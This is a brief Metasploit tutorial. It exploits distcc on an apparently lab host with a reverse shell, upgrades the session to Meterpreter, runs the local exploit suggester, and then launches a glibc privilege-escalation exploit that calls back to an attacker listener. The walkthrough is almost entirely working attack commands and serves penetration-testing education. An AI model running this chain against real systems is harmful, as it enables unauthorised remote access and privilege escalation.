Local Exploit Suggester

This will explain how we can use the Local Exploit Suggester function in Metasploit.

Run msfconsole to start the Metasploit.

>msfconsole

Search for an exploit

msf5 > search distcc

Execute the exploit

msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > options
msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.0.50
msf5 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
msf5 exploit(unix/misc/distcc_exec) >set lhost 192.168.142.141
msf5 exploit(unix/misc/distcc_exec) >run

Background the session

# Ctrl+z

Background session 1? [y/N]  y

Upgrade the session to Meterpreter

msf5 exploit(unix/misc/distcc_exec) > sessions
msf5 exploit(unix/misc/distcc_exec) > sessions -u 1 # Upgrade the current session id 1 to meterpreter and create a new session (id 2) for it
msf5 exploit(unix/misc/distcc_exec) > sessions
msf5 exploit(unix/misc/distcc_exec) > sessions -i 2 
meterpreter > getuid
meterpreter > background

Search local exploit # This is the most important part.

msf5 exploit(unix/misc/distcc_exec) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > options
msf5 post(multi/recon/local_exploit_suggester) > set session 2 # meterpreter shell
msf5 post(multi/recon/local_exploit_suggester) > run

Run local exploit

msf5 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > options
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 2
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lhost 10.10.0.1
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lport 4321
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run